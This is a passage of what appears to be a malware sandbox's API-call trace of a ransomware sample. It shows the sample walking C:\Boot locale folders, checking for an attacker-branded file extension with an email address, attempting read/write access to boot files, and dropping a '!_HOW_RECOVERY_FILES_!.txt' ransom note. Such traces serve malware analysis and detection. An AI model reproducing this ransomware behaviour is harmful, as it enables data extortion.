(_String1=".", _String2="nl-NL") returned -1 [0078.564] wcscmp (_String1="..", _String2="nl-NL") returned -1 [0078.564] wcslen (_String="C:\\\\Boot\\nl-NL") returned 0xe [0078.564] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\nl-NL" | out: _Destination="C:\\\\Boot\\nl-NL") returned 0x0 [0078.564] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\nl-NL\\*") returned="C:\\\\Boot\\nl-NL\\*" [0078.564] FindFirstFileW (in: lpFileName="C:\\\\Boot\\nl-NL\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0078.564] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.564] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\nl-NL\\.") returned 16 [0078.564] wcscmp (_String1=".", _String2=".") returned 0 [0078.564] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0078.564] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.564] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\nl-NL\\..") returned 17 [0078.564] wcscmp (_String1=".", _String2="..") returned -1 [0078.564] wcscmp (_String1="..", _String2="..") returned 0 [0078.564] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0078.564] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.564] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui") returned 30 [0078.564] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0078.564] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0078.564] wcslen (_String="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui") returned 0x1e [0078.564] CreateFileW (lpFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0078.564] GetLastError () returned 0x5 [0078.564] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0078.564] wcsstr (_Str="memtest.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.564] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\nl-NL\\memtest.exe.mui") returned 30 [0078.565] wcscmp (_String1="memtest.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0078.565] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="memtest.exe.mui") returned 0x0 [0078.565] wcslen (_String="C:\\\\Boot\\nl-NL\\memtest.exe.mui") returned 0x1e [0078.565] CreateFileW (lpFileName="C:\\\\Boot\\nl-NL\\memtest.exe.mui" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0078.604] GetLastError () returned 0x5 [0078.604] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0078.604] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0078.605] wcslen (_String="C:\\\\Boot\\nl-NL") returned 0xe [0078.605] strlen (_Str="${KEY}") returned 0x6 [0078.605] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0078.605] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0078.605] strlen (_Str="${CODE}") returned 0x7 [0078.605] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0078.605] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0078.605] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0078.605] _wfsopen (_FileName="C:\\\\Boot\\nl-NL\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0078.705] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0078.705] __uncaught_exception () returned 0x84b1160800 [0078.705] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0078.706] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0078.706] wcsstr (_Str="pl-PL", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.706] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\pl-PL") returned 14 [0078.706] wcscmp (_String1=".", _String2="pl-PL") returned -1 [0078.706] wcscmp (_String1="..", _String2="pl-PL") returned -1 [0078.706] wcslen (_String="C:\\\\Boot\\pl-PL") returned 0xe [0078.706] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\pl-PL" | out: _Destination="C:\\\\Boot\\pl-PL") returned 0x0 [0078.706] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\pl-PL\\*") returned="C:\\\\Boot\\pl-PL\\*" [0078.706] FindFirstFileW (in: lpFileName="C:\\\\Boot\\pl-PL\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0078.706] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.706] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\pl-PL\\.") returned 16 [0078.706] wcscmp (_String1=".", _String2=".") returned 0 [0078.706] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0078.706] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.706] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\pl-PL\\..") returned 17 [0078.706] wcscmp (_String1=".", _String2="..") returned -1 [0078.706] wcscmp (_String1="..", _String2="..") returned 0 [0078.706] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0078.706] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.706] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui") returned 30 [0078.706] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0078.706] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0078.706] wcslen (_String="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui") returned 0x1e [0078.706] CreateFileW (lpFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0078.707] GetLastError () returned 0x5 [0078.707] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0078.707] wcsstr (_Str="memtest.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.707] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\pl-PL\\memtest.exe.mui") returned 30 [0078.707] wcscmp (_String1="memtest.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0078.707] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="memtest.exe.mui") returned 0x0 [0078.707] wcslen (_String="C:\\\\Boot\\pl-PL\\memtest.exe.mui") returned 0x1e [0078.707] CreateFileW (lpFileName="C:\\\\Boot\\pl-PL\\memtest.exe.mui" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0078.707] GetLastError () returned 0x5 [0078.707] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0078.707] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0078.707] wcslen (_String="C:\\\\Boot\\pl-PL") returned 0xe [0078.707] strlen (_Str="${KEY}") returned 0x6 [0078.707] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0078.707] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0078.707] strlen (_Str="${CODE}") returned 0x7 [0078.707] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0078.707] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0078.707] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0078.708] _wfsopen (_FileName="C:\\\\Boot\\pl-PL\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0078.758] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0078.758] __uncaught_exception () returned 0x84b1160800 [0078.758] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0078.758] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0078.758] wcsstr (_Str="pt-BR", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.758] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\pt-BR") returned 14 [0078.758] wcscmp (_String1=".", _String2="pt-BR") returned -1 [0078.758] wcscmp (_String1="..", _String2="pt-BR") returned -1 [0078.758] wcslen (_String="C:\\\\Boot\\pt-BR") returned 0xe [0078.758] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\pt-BR" | out: _Destination="C:\\\\Boot\\pt-BR") returned 0x0 [0078.758] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\pt-BR\\*") returned="C:\\\\Boot\\pt-BR\\*" [0078.759] FindFirstFileW (in: lpFileName="C:\\\\Boot\\pt-BR\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0078.772] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.772] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\pt-BR\\.") returned 16 [0078.772] wcscmp (_String1=".", _String2=".") returned 0 [0078.772] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0078.772] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.772] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\pt-BR\\..") returned 17 [0078.772] wcscmp (_String1=".", _String2="..") returned -1 [0078.772] wcscmp (_String1="..", _String2="..") returned 0 [0078.772] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0078.772] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.772] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui") returned 30 [0078.772] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0078.772] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0078.772] wcslen (_String="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui") returned 0x1e [0078.772] CreateFileW (lpFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0078.772] GetLastError () returned 0x5 [0078.772] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0078.772] wcsstr (_Str="memtest.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.772] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\pt-BR\\memtest.exe.mui") returned 30 [0078.772] wcscmp (_String1="memtest.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0078.772] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="memtest.exe.mui") returned 0x0 [0078.772] wcslen (_String="C:\\\\Boot\\pt-BR\\memtest.exe.mui") returned 0x1e [0078.772] CreateFileW (lpFileName="C:\\\\Boot\\pt-BR\\memtest.exe.mui" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0078.773] GetLastError () returned 0x5 [0078.773] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0078.773] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0078.773] wcslen (_String="C:\\\\Boot\\pt-BR") returned 0xe [0078.773] strlen (_Str="${KEY}") returned 0x6 [0078.773] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0078.773] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0078.773] strlen (_Str="${CODE}") returned 0x7 [0078.773] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0078.773] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0078.773] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0078.773] _wfsopen (_FileName="C:\\\\Boot\\pt-BR\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0078.828] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0078.828] __uncaught_exception () returned 0x84b1160800 [0078.828] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0078.829] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0078.829] wcsstr (_Str="pt-PT", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.829] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\pt-PT") returned 14 [0078.829] wcscmp (_String1=".", _String2="pt-PT") returned -1 [0078.829] wcscmp (_String1="..", _String2="pt-PT") returned -1 [0078.829] wcslen (_String="C:\\\\Boot\\pt-PT") returned 0xe [0078.829] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\pt-PT" | out: _Destination="C:\\\\Boot\\pt-PT") returned 0x0 [0078.829] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\pt-PT\\*") returned="C:\\\\Boot\\pt-PT\\*" [0078.829] FindFirstFileW (in: lpFileName="C:\\\\Boot\\pt-PT\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0078.829] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.829] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\pt-PT\\.") returned 16 [0078.829] wcscmp (_String1=".", _String2=".") returned 0 [0078.829] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0078.829] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.829] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\pt-PT\\..") returned 17 [0078.829] wcscmp (_String1=".", _String2="..") returned -1 [0078.829] wcscmp (_String1="..", _String2="..") returned 0 [0078.829] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0078.829] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.830] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui") returned 30 [0078.830] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0078.830] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0078.830] wcslen (_String="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui") returned 0x1e [0078.830] CreateFileW (lpFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0078.969] GetLastError () returned 0x5 [0078.969] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0078.969] wcsstr (_Str="memtest.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.969] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\pt-PT\\memtest.exe.mui") returned 30 [0078.969] wcscmp (_String1="memtest.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0078.969] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="memtest.exe.mui") returned 0x0 [0078.969] wcslen (_String="C:\\\\Boot\\pt-PT\\memtest.exe.mui") returned 0x1e [0078.969] CreateFileW (lpFileName="C:\\\\Boot\\pt-PT\\memtest.exe.mui" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0078.969] GetLastError () returned 0x5 [0078.969] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0078.969] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0078.969] wcslen (_String="C:\\\\Boot\\pt-PT") returned 0xe [0078.969] strlen (_Str="${KEY}") returned 0x6 [0078.969] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0078.969] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0078.969] strlen (_Str="${CODE}") returned 0x7 [0078.969] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0078.970] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0078.970] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0078.970] _wfsopen (_FileName="C:\\\\Boot\\pt-PT\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0079.002] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0079.003] __uncaught_exception () returned 0x84b1160800 [0079.003] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0079.003] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0079.003] wcsstr (_Str="qps-ploc", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.003] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\qps-ploc") returned 17 [0079.003] wcscmp (_String1=".", _String2="qps-ploc") returned -1 [0079.003] wcscmp (_String1="..", _String2="qps-ploc") returned -1 [0079.003] wcslen (_String="C:\\\\Boot\\qps-ploc") returned 0x11 [0079.003] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\qps-ploc" | out: _Destination="C:\\\\Boot\\qps-ploc") returned 0x0 [0079.003] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\qps-ploc\\*") returned="C:\\\\Boot\\qps-ploc\\*" [0079.003] FindFirstFileW (in: lpFileName="C:\\\\Boot\\qps-ploc\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0079.004] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.004] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\qps-ploc\\.") returned 19 [0079.004] wcscmp (_String1=".", _String2=".") returned 0 [0079.004] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.004] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.004] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\qps-ploc\\..") returned 20 [0079.004] wcscmp (_String1=".", _String2="..") returned -1 [0079.004] wcscmp (_String1="..", _String2="..") returned 0 [0079.004] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.004] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.004] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\qps-ploc\\bootmgr.exe.mui") returned 33 [0079.004] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0079.004] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0079.004] wcslen (_String="C:\\\\Boot\\qps-ploc\\bootmgr.exe.mui") returned 0x21 [0079.004] CreateFileW (lpFileName="C:\\\\Boot\\qps-ploc\\bootmgr.exe.mui" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0079.004] GetLastError () returned 0x5 [0079.004] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.004] wcsstr (_Str="memtest.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.004] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\qps-ploc\\memtest.exe.mui") returned 33 [0079.004] wcscmp (_String1="memtest.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0079.004] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="memtest.exe.mui") returned 0x0 [0079.004] wcslen (_String="C:\\\\Boot\\qps-ploc\\memtest.exe.mui") returned 0x21 [0079.004] CreateFileW (lpFileName="C:\\\\Boot\\qps-ploc\\memtest.exe.mui" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0079.039] GetLastError () returned 0x5 [0079.039] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0079.040] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0079.040] wcslen (_String="C:\\\\Boot\\qps-ploc") returned 0x11 [0079.040] strlen (_Str="${KEY}") returned 0x6 [0079.040] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0079.040] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0079.040] strlen (_Str="${CODE}") returned 0x7 [0079.040] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0079.040] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0079.040] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0079.040] _wfsopen (_FileName="C:\\\\Boot\\qps-ploc\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0079.086] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0079.086] __uncaught_exception () returned 0x84b1160800 [0079.086] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0079.087] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0079.087] wcsstr (_Str="Resources", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.087] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\Resources") returned 18 [0079.087] wcscmp (_String1=".", _String2="Resources") returned -1 [0079.087] wcscmp (_String1="..", _String2="Resources") returned -1 [0079.087] wcslen (_String="C:\\\\Boot\\Resources") returned 0x12 [0079.087] wcscpy_s (in: 